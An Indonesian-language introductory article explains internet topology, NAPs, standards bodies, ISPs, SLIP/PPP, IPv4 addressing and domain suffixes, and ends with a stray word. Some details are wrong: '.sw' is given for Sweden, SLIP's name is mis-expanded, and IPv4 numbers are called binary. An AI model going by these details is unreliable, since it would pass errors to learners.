Topologi internet pada dasarnya adalah mesh-topology, menghubungkan banyak jenis jaringan melalui sistem packet-switching, kalaupun bisa dikatakan yang menjadi pusat-nya adalah beberapa NAP (Network Access Point) yang ada di San Fransisco (Pacific Bell), di Chicago (Ameritech), New Jersey (Sprint), dan Merit Access Exchange (MAE) di San Fransisco (MAE West) dan Washington, D.C (MAE East) yang ditangani oleh MFS Datanet.

Walaupun tidak ada organisasi yang memiliki internet, namun ada banyak organisasi yang memelihara jaringan ini melalui penetapan standarisasi protokol, aturan-aturan, serta metoda akses. Internet Engineering Task Force (IETF) menangani masalah-masalah teknis yang timbul di internet,  seperti masalah pada protokol, arsitektur dan pengoperasian internet. Internet Research Task Force (IRTF) menangani riset teknis, seperti sistem pengalamatan dan rekayasa lainnya. Internet Assigned Numbers Authority (IANA) mengatur pembagian alamat IP (IP#) ke berbagai negara dan organisasi. Internet Society (ISOC) menangani masalah administrasi dan struktur organisasi internet.

Badan usaha komersil kemudian menyediakan layanan akses dengan menyediakan koneksi dari komputer pengguna ke internet, dan badan ini disebut sebagai penyedia akses internet atau ISP. Beberapa ISP terkenal di dunia adalah America On Line (AOL), Australia OnLine, CompuServe, GEnie, dan Prodigy. Di Indonesia ada TelkomNet, IndosatNet, Wasantara Net, InterNux, dan sebagainya. ISP menyediakan koneksi dial-up melalui modem-telepon, koneksi wireless melalui antena WLAN, atau koneksi ADSL melalui telepon. Protokol koneksi yang digunakan adalah SLIP (Serial Line Interface Protocol) atau PPP (Point-to-Point Protocol), dimana koneksi SLIP biasanya lebih lambat dari PPP.

GAMBAR: Koneksi ke Internet

Secara logis jaringan internet dibagi kedalam beberapa domain, yang menurut standar IPv4 (Internet Protocol version 4) di-identifikasi melalui nomer IP 32 bit atau 4 angka biner yang dipisahkan dengan titik (seperti 192.168.10.25). Tipe domain standar antara lain:

.com = organisasi komersil
.edu  = institusi pendidikan di Amerika
.ac    = institusi akademik
.gov  = institusi pemerintah
.mil   = organisasi militer
.net   = penyedia akses jaringan
.org   = organisasi non-profit

Disamping itu domain juga dibagi berdasarkan negara, misalnya:

.au    =  Australia
.ca    =  Kanada
.id     =  Indonesia
.jp     =  Jepang
.my   =  Malaysia
.sw   =   Swedia
.th     =  Thailand

Sumber : http://teknik-informatika.com/jaringan-internet/

Gay